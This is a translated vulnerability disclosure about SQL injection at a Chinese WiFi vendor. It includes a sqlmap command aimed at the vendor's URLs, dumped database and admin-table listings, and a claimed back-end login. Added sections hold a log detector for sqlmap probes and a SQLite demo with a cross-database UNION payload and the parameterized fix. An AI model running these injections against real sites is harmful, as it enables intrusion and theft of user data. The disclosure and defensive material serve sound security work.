WiFi security: SQL injection at 微商无线 (Weishang Wireless, wswifi.cn) exposes 560k user records (can control 360 merchant devices, including internet cafes)

Posted by admin, 2017-04-24 15:38:49
Summary

2016-04-22: Details sent to the vendor; awaiting the vendor's response
2016-04-22: Vendor confirmed; details disclosed to the vendor only
2016-05-02: Details disclosed to core white hats and domain experts
2016-05-12: Details disclosed to regular white hats
2016-05-22: Details disclosed to intern white hats
2016-06-06: Details disclosed to the public

Vulnerability summary

Defect ID: WooYun-2016-196946

Title: WiFi security: SQL injection at 微商无线 (Weishang Wireless, wswifi.cn) exposes 560k user records (can control 360 merchant devices, including internet cafes)

Vendor: wswifi.cn

Author: 黑色键盘丶

Submitted: 2016-04-22 14:05

Published: 2016-06-06 14:10

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor confirmed

Source: www.wooyun.org

Tags: injection techniques


Vulnerability details

Brief description:

As the title says; cross-database queries are possible.

Detailed description:

Code:
Injection point: sqlmap.py -u "http://www.wswifi.cn/news_text.asp?newsid=3"
Second injection point: http://ws.wswifi.cn/news_text.asp?newsid=25
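What a sqlmap run like the one above leaves behind in the web server's access log, and a small detector for it, as an added example that is not part of the original report. The log lines are constructed (IIS-style space-separated fields in the order of the constructed #Fields line, documentation IP addresses, and a sqlmap User-Agent string whose exact form is an assumption); newsid being the only integer-typed parameter is inferred from the URL in the report. The detector goes a little beyond the report: besides non-integer values in integer parameters it also flags quote, comment and UNION/SELECT tokens in free-text parameters.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample log (not from the site). IIS writes "+" for spaces inside the
# User-Agent field, which keeps one request per line when splitting on spaces.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2016-04-22 06:01:10 GET /news_text.asp newsid=3 203.0.113.10 Mozilla/5.0+(Windows+NT+6.1) 200
2016-04-22 06:01:11 GET /news_text.asp newsid=3%20AND%201%3D1 203.0.113.10 sqlmap/1.0-dev+(http://sqlmap.org) 200
2016-04-22 06:01:11 GET /news_text.asp newsid=3%20AND%201%3D2 203.0.113.10 sqlmap/1.0-dev+(http://sqlmap.org) 200
2016-04-22 06:01:12 GET /news_text.asp newsid=3%20UNION%20ALL%20SELECT%20NULL%2CNULL-- 203.0.113.10 sqlmap/1.0-dev+(http://sqlmap.org) 500
2016-04-22 06:02:00 GET /news_text.asp newsid=25 198.51.100.7 Mozilla/5.0+(Macintosh) 200
"""

# Parameters this site should only ever receive as plain integers (assumed from the report's URL).
INTEGER_PARAMS = {"newsid"}

# Tokens that have no business in a free-text parameter value.
SQL_TOKENS = re.compile(r"\bunion\b.*\bselect\b|'|--|;|\bwaitfor\s+delay\b", re.IGNORECASE)


def parse_line(line):
    """Split one log line into a dict; returns None for lines that do not fit the layout."""
    parts = line.split(" ")
    if len(parts) < 8:
        return None
    date, time, method, stem, query, client, ua, status = parts[:8]
    return {"time": date + " " + time, "method": method, "stem": stem, "query": query,
            "client": client, "ua": unquote_plus(ua), "status": status}


def classify(rec):
    """Reasons this request looks like SQL injection; an empty list means nothing noticed."""
    reasons = []
    if "sqlmap" in rec["ua"].lower():
        reasons.append("sqlmap user-agent")
    # parse_qs percent-decodes the values, so "3%20AND%201%3D1" is inspected as "3 AND 1=1".
    for name, values in parse_qs(rec["query"]).items():
        for value in values:
            if name in INTEGER_PARAMS and not value.isdigit():
                reasons.append("non-integer %s=%r" % (name, value))
            elif name not in INTEGER_PARAMS and SQL_TOKENS.search(value):
                reasons.append("SQL token in %s=%r" % (name, value))
    return reasons


def scan(log_text):
    """Run the checks over a whole log; returns (line number, client ip, reasons) per hit."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append((number, rec["client"], reasons))
    return findings


if __name__ == "__main__":
    for number, client, reasons in scan(SAMPLE_LOG):
        print(number, client, "; ".join(reasons))
```

The User-Agent check is the weakest signal (sqlmap's --random-agent replaces it); the integer-parameter check is the one that matches the boolean-based probe sqlmap starts with, and it needs no signature beyond knowing which parameters the application treats as numbers.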

Database information

Code:
back-end DBMS: Microsoft SQL Server 2008
available databases [8]:
[*] Engineering_database
[*] master
[*] model
[*] msdb
[*] tempdb
[*] ws_weigou
[*] wswifi
[*] xhzA8_V10_2013

Table information

Code:
Database: wswifi
+------------------------------+---------+
| Table | Entries |
+------------------------------+---------+
| dbo.user_Browse_record | 261096 |
| dbo.free_renzheng | 211319 |
| dbo.setggao_Browse_record | 43750 |
| dbo.user_Browse_allcount | 28472 |
| dbo.china | 3295 |
| dbo.user_login | 2640 |
| dbo.Businesses_data | 1451 |
| dbo.column_type | 1416 |
| dbo.user_prozan | 1345 |
| dbo.user_singin | 1208 |
| dbo.Businesses_user | 1180 |
| dbo.product | 849 |
| dbo.[user_renzheng_count---] | 450 |
| dbo.setggao_allcount | 373 |
| dbo.businesses | 360 |
| dbo.product_query | 327 |
| dbo.propinglun | 299 |
| dbo.Merchants | 273 |
| dbo.Businessesuser_roll | 260 |
| dbo.setggao_click_record | 230 |
| dbo.pangolin_test_table | 192 |
| dbo.job_Browse_record | 190 |
| dbo.user_renzheng | 96 |
| dbo.kehu_fahuo | 87 |
| dbo.Businessesuser_active | 83 |
| dbo.kehu_info | 73 |
| dbo.user_renzheng_weixin | 47 |
| dbo.rizhi_info | 46 |
| dbo.agent_apply | 33 |
| dbo.index_news | 29 |
| dbo.Businesses_Transfer | 28 |
| dbo.agent | 27 |
| dbo.setggao_fabu | 20 |
| dbo.agent_salesman | 18 |
| dbo.industry | 11 |
| dbo.Identification_type | 10 |
| dbo.[setggao_order---] | 9 |
| dbo.setggao | 7 |
| dbo.index_help | 5 |
| dbo.column_display_mode | 4 |
| dbo.agent_jibie | 3 |
| dbo.agent_job | 3 |
| dbo.wswifiadmin | 3 |
| dbo.column_leixing | 2 |
| dbo.job_Apply | 2 |
| dbo.[ggao_send----] | 1 |
| dbo.[ggao_type--] | 1 |
| dbo.setggao_send | 1 |
+------------------------------+---------+

After dumping the wswifiadmin table I logged into the back end: 360 merchants.

[screenshot]

They are all internet cafes, KTVs and the like.

Cross-database query; this includes order information and more.

Code:
Database: ws_weigou
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| dbo.user_order_awardnum | 407332 |
| dbo.user_browsepro_record | 269214 |
| dbo.user_liulan_record | 111459 |
| dbo.user_Integral_detailed | 4424 |
| dbo.user_login | 3807 |
| dbo.china | 3295 |
| dbo.user_order | 3074 |
| dbo.wg_user | 2421 |
| dbo.user_consumption_record | 542 |
| dbo.[user_browsepro_record--] | 523 |
| dbo.user_recharge_record | 507 |
| dbo.Product_shopping_trolley | 429 |
| dbo.user_red_envelopes | 357 |
| dbo.Product_award | 59 |
| dbo.category | 30 |
| dbo.product | 25 |
| dbo.uploadapp_pro | 24 |
| dbo.user_delivery_address | 18 |
| dbo.user_award_public | 15 |
| dbo.crowdfunding_pro | 14 |
| dbo.crowdfunding_order_record | 10 |
| dbo.crowdfunding_order | 8 |
| dbo.friend_pro | 7 |
| dbo.user_grade | 2 |
| dbo.crowdfunding_order_temp | 1 |
| dbo.uploadadd | 1 |
| dbo.user_order_temp | 1 |
| dbo.wsweigou_admin | 1 |
+-------------------------------+---------+
Code:
Database: Engineering_database
+----------------------------------+---------+
| Table | Entries |
+----------------------------------+---------+
| dbo.ggao_showcount_beifen | 25196092 |
| dbo.ggao_showcount | 3060837 |
| dbo.[ad_zhuomian_showcount--] | 1648957 |
| dbo.netbar_user_count | 561529 |
| dbo.ggao_clickcount | 486537 |
| dbo.ggao_allcount | 408032 |
| dbo.[ad_renzheng_lunbo_count--] | 328725 |
| dbo.rand_six_password | 200000 |
| dbo.netbar_user_allcount | 67232 |
| dbo.[netbar_zhuomian_allcount--] | 63633 |
| dbo.netbar_user_login | 47431 |
| dbo.netbar_user | 41135 |
| dbo.[ad_zhuomian_clickcount--] | 33934 |
| dbo.user_recharge | 8927 |
| dbo.netbar_login | 7432 |
| dbo.china | 3295 |
| dbo.ggao_fabu | 3008 |
| dbo.[netbar_lunbo_allcount--] | 1539 |
| dbo.product | 396 |
| dbo.Product_query | 312 |
| dbo.netbar | 281 |
| dbo.Package | 176 |
| dbo.ggao_send | 38 |
| dbo.netbar_admin | 29 |
| dbo.salesman | 21 |
| dbo.[ad_zhuomian--] | 17 |
| dbo.[Engineering_user--] | 9 |
| dbo.ggao_zizhu_allcount | 9 |
| dbo.netbar_user_renzheng | 8 |
| dbo.[ad_renzheng_lunbo--] | 3 |
| dbo.Engineering_admin | 3 |
| dbo.ggao_type | 3 |
| dbo.[ad_shezhi--] | 1 |
+----------------------------------+---------+

dbo.netbar_user_count | 561529

560k user records

[screenshot]

Proof of vulnerability: (identical to the detailed description above)


Fix:

Filter the input: newsid should be validated as an integer, and the query should bind it as a parameter instead of concatenating the raw request value into the SQL string.
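The injection pattern behind news_text.asp?newsid= and the fix side by side, as an added example that is not the site's own code (the report does not show the ASP source). The two MSSQL databases are emulated with SQLite, using ATTACH in place of MSSQL's ws_weigou.dbo.* naming; the table names index_news and wsweigou_admin come from the report's dumps, the column names and the admin row are constructed, and the vulnerable handler is assumed to concatenate newsid into the query, which is what the boolean-based behaviour sqlmap found implies.

```python
import sqlite3


def build_db():
    """Two SQLite databases standing in for the MSSQL databases in the report:
    the site database (main) with index_news, and ws_weigou attached beside it.
    Column names and the admin row are constructed for this example."""
    conn = sqlite3.connect(":memory:")
    conn.execute("ATTACH DATABASE ':memory:' AS ws_weigou")
    conn.execute("CREATE TABLE index_news (newsid INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO index_news VALUES (?, ?, ?)",
                     [(3, "News 3", "body of news 3"), (25, "News 25", "body of news 25")])
    conn.execute("CREATE TABLE ws_weigou.wsweigou_admin (username TEXT, password TEXT)")
    conn.execute("INSERT INTO ws_weigou.wsweigou_admin VALUES (?, ?)",
                 ("admin", "constructed-sample-hash"))
    return conn


def news_text_vulnerable(conn, newsid):
    """Assumed shape of the original handler: the raw newsid value is concatenated
    into the statement, so the integer position accepts arbitrary SQL."""
    sql = "SELECT title, body FROM index_news WHERE newsid=" + newsid
    return conn.execute(sql).fetchall()


def news_text_hardened(conn, newsid):
    """Fix: insist on a plain integer and bind it as a parameter."""
    if not newsid.isdigit():
        raise ValueError("newsid must be an integer")
    sql = "SELECT title, body FROM index_news WHERE newsid=?"
    return conn.execute(sql, (int(newsid),)).fetchall()


def boolean_probe(handler, conn, base="3"):
    """The first check sqlmap runs on an integer parameter: '3 AND 1=1' must behave
    like '3' and '3 AND 1=2' must return nothing. True means the parameter is injectable."""
    try:
        same = handler(conn, base + " AND 1=1") == handler(conn, base)
        empty = handler(conn, base + " AND 1=2") == []
    except ValueError:
        return False
    return same and empty


# Cross-database read through the integer parameter. MSSQL would spell the table
# ws_weigou.dbo.wsweigou_admin; SQLite spells it ws_weigou.wsweigou_admin.
CROSS_DB_PAYLOAD = "3 UNION SELECT username, password FROM ws_weigou.wsweigou_admin"


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable handler injectable:", boolean_probe(news_text_vulnerable, conn))
    print("rows leaked across databases:", news_text_vulnerable(conn, CROSS_DB_PAYLOAD))
    print("hardened handler injectable:", boolean_probe(news_text_hardened, conn))
```

The integer check alone would already stop this particular payload, but the bound parameter is the part that holds when the next page takes a string; keeping both is cheap and makes the integer column's type part of the contract rather than something the database infers from the concatenated text.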

Copyright notice: when reposting, credit the source 黑色键盘丶@乌云


Vulnerability response

Vendor response:

Severity: High

Rank: 20

Confirmed: 2016-04-22 14:08

Vendor reply:

High-risk vulnerability

Latest status:

None

